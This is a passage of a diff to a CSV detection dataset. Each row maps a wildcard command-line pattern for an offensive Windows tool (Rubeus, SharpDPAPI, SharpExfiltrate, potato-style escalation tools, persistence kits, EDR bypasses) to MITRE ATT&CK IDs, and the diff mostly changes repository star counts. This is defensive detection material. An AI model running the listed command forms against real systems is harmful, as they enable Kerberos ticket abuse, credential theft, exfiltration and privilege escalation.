tools","https://github.com/foxlox/GIUDA","1","0","N/A","9","4","387","50","2023-09-28T15:54:16Z","2023-07-19T15:37:07Z" +"*.exe -gettgs -luid:*","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/foxlox/GIUDA","1","0","N/A","9","4","388","50","2023-09-28T15:54:16Z","2023-07-19T15:37:07Z" "*.exe gmsainfo --sid *","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","0","N/A","7","2","113","17","2023-07-03T09:35:48Z","2022-02-03T10:32:05Z" "*.exe GoogleDrive --appname * --accesstoken * --filepath * --extensions * --memoryonly*","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" -"*.exe -group=all *","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","fp risks","N/A","10","3137","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" -"*.exe -group=all -full*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","fp risks","N/A","10","3137","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" -"*.exe -group=remote *","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","fp risks","N/A","10","3137","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" -"*.exe -group=system *","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","fp risks","N/A","10","3137","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" -"*.exe -group=user *","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","fp risks","N/A","10","3137","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" -"*.exe hash /password:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"*.exe -i -c powershell.exe*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1569","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" +"*.exe -group=all *","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","fp risks","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*.exe -group=all -full*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","fp risks","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*.exe -group=remote *","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","fp risks","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*.exe -group=system *","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","fp risks","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*.exe -group=user *","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","fp risks","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*.exe hash /password:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*.exe -i -c powershell.exe*","offensive_tool_keyword","printspoofer","Abusing impersonation privileges through the Printer Bug","T1134 - T1003 - T1055","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrintSpoofer","1","0","N/A","10","10","1573","321","2020-09-10T17:49:41Z","2020-04-28T08:26:29Z" "*.exe kdsinfo --guid *","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","0","N/A","7","2","113","17","2023-07-03T09:35:48Z","2022-02-03T10:32:05Z" -"*.exe krbscm -c *cmd.exe*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","10","4","315","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" +"*.exe krbscm -c *cmd.exe*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","10","4","316","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" "*.exe -l * -c {B91D5831-B1BD-4608-8198-D72E155020F7}*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" "*.exe -l * -c {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} -a*","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","10","8","703","90","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" -"*.exe machinetriage*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" -"*.exe masterkeys /hashes*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" -"*.exe masterkeys /hashes*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","959","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*.exe machinetriage*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*.exe masterkeys /hashes*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" +"*.exe masterkeys /hashes*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","0","N/A","10","10","961","187","2023-08-28T19:03:12Z","2018-08-22T17:39:31Z" "*.exe monitor /interval:5 /nowrap","offensive_tool_keyword","AD exploitation cheat sheet","Unconstrained delegation Exploitation with Rubeus","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*.exe NonstandardProcesses*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3137","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" -"*.exe NTLMSettings*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3137","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*.exe NonstandardProcesses*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*.exe NTLMSettings*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" "*.exe OneDrive --username * --password * --filepath *\*.exe*","offensive_tool_keyword","SharpExfiltrate","Modular C# framework to exfiltrate loot over secure and trusted channels.","T1027 - T1567 - T1561","TA0010 - TA0040 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/Flangvik/SharpExfiltrate","1","0","N/A","10","2","116","26","2021-09-12T17:08:02Z","2021-09-08T13:17:00Z" "*.exe --override-file --source-file *.exe*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*.exe ptt /ticket:*","offensive_tool_keyword","AD exploitation cheat sheet","Unconstrained delegation Exploitation with Rubeus","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*.exe -ptt ticket:*.kirbi*","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/foxlox/GIUDA","1","0","N/A","9","4","387","50","2023-09-28T15:54:16Z","2023-07-19T15:37:07Z" -"*.exe --pwsh *.ps1 *.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" -"*.exe -q InterestingProcesses*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3137","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" -"*.exe -q PowerShell*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3137","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" -"*.exe -q WindowsDefender*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3137","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" -"*.exe rbcd -m * -p * -c *cmd.exe*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","10","4","315","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" +"*.exe -ptt ticket:*.kirbi*","offensive_tool_keyword","GIUDA","Ask a TGS on behalf of another user without password","T1558.003 - T1059.003","TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/foxlox/GIUDA","1","0","N/A","9","4","388","50","2023-09-28T15:54:16Z","2023-07-19T15:37:07Z" +"*.exe --pwsh *.ps1 *.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*.exe -q InterestingProcesses*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*.exe -q PowerShell*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*.exe -q WindowsDefender*","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/GhostPack/Seatbelt","1","0","N/A","N/A","10","3139","606","2023-07-06T06:16:29Z","2018-07-24T17:38:51Z" +"*.exe rbcd -m * -p * -c *cmd.exe*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","10","4","316","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" "*.exe --remove-reparse --source-file *.exe*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*.exe -s * -c service_mod *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "*.exe -s *\x*\x*\x*","offensive_tool_keyword","frampton","PE Binary Shellcode Injector - Automated code cave discovery. shellcode injection - ASLR bypass - x86/x64 compatible","T1055 - T1548.002 - T1129 - T1001","TA0002 - TA0003- TA0004 -TA0011","N/A","N/A","POST Exploitation tools","https://github.com/ins1gn1a/Frampton","1","1","N/A","N/A","1","69","16","2019-11-24T22:34:48Z","2019-10-29T00:22:14Z" "*.exe s4u /ticket:* /impersonateuser:* /msdsspn:* /ptt*","offensive_tool_keyword","AD exploitation cheat sheet","Rubeus Use s4u2self and s4u2proxy to impersonate the DA user to the allowed SPN","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*.exe s4u /user:* /impersonateuser:* /msdsspn:* /altservice:ldap /ptt /rc4*","offensive_tool_keyword","AD exploitation cheat sheet","Rubeus access the LDAP service on the DC (for dcsync)","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*.exe --schedule * *.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" -"*.exe --screensaver *:\*.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*.exe --schedule * *.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*.exe --screensaver *:\*.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" "*.exe Search Find-Persist*","offensive_tool_keyword","COM-Hunter","COM-hunter is a COM Hijacking persistnce tool written in C#","T1122 - T1055.012","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/nickvourd/COM-Hunter","1","0","N/A","10","3","215","39","2023-09-06T09:48:55Z","2022-05-26T19:34:59Z" "*.exe --set-reparse override --source-file *.exe --target-file *","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" -"*.exe shadowcred -c * -f*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","10","4","315","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" +"*.exe shadowcred -c * -f*","offensive_tool_keyword","S4UTomato","Escalate Service Account To LocalSystem via Kerberos","T1558 - T1558.002 - T1548.002 - T1078 - T1078.004","TA0006 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/wh0amitz/S4UTomato","1","0","N/A","10","4","316","58","2023-09-14T08:53:19Z","2023-07-30T11:51:57Z" "*.exe -sniffer n*","offensive_tool_keyword","Inveigh",".NET IPv4/IPv6 machine-in-the-middle tool for penetration testers","T1550.002 - T1059.001 - T1071.001","TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/Kevin-Robertson/Inveigh","1","0","N/A","10","10","2212","441","2023-06-13T01:36:42Z","2015-04-02T18:04:41Z" -"*.exe --startup *:\*.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","133","19","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" -"*.exe -t startupfolder -c * -a * -f*","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1150","233","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" -"*.exe -t tortoisesvn -c * -a * -m*","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1150","233","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" +"*.exe --startup *:\*.exe*","offensive_tool_keyword","RedPersist","RedPersist is a Windows Persistence tool written in C#","T1053 - T1547 - T1112","TA0004 - TA0005 - TA0040","N/A","N/A","Persistence","https://github.com/mertdas/RedPersist","1","0","N/A","10","2","134","20","2023-09-25T19:58:47Z","2023-08-13T22:10:46Z" +"*.exe -t startupfolder -c * -a * -f*","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1151","233","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" +"*.exe -t tortoisesvn -c * -a * -m*","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1151","233","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" "*.exe -t wl-extract.dll -d *.dat -r *.rsa -*.exe*","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","61","5","2023-07-23T03:10:44Z","2023-07-10T11:57:44Z" "*.exe triage","offensive_tool_keyword","AD exploitation cheat sheet","Unconstrained delegation Exploitation with Rubeus","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*.exe triage /password:*","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 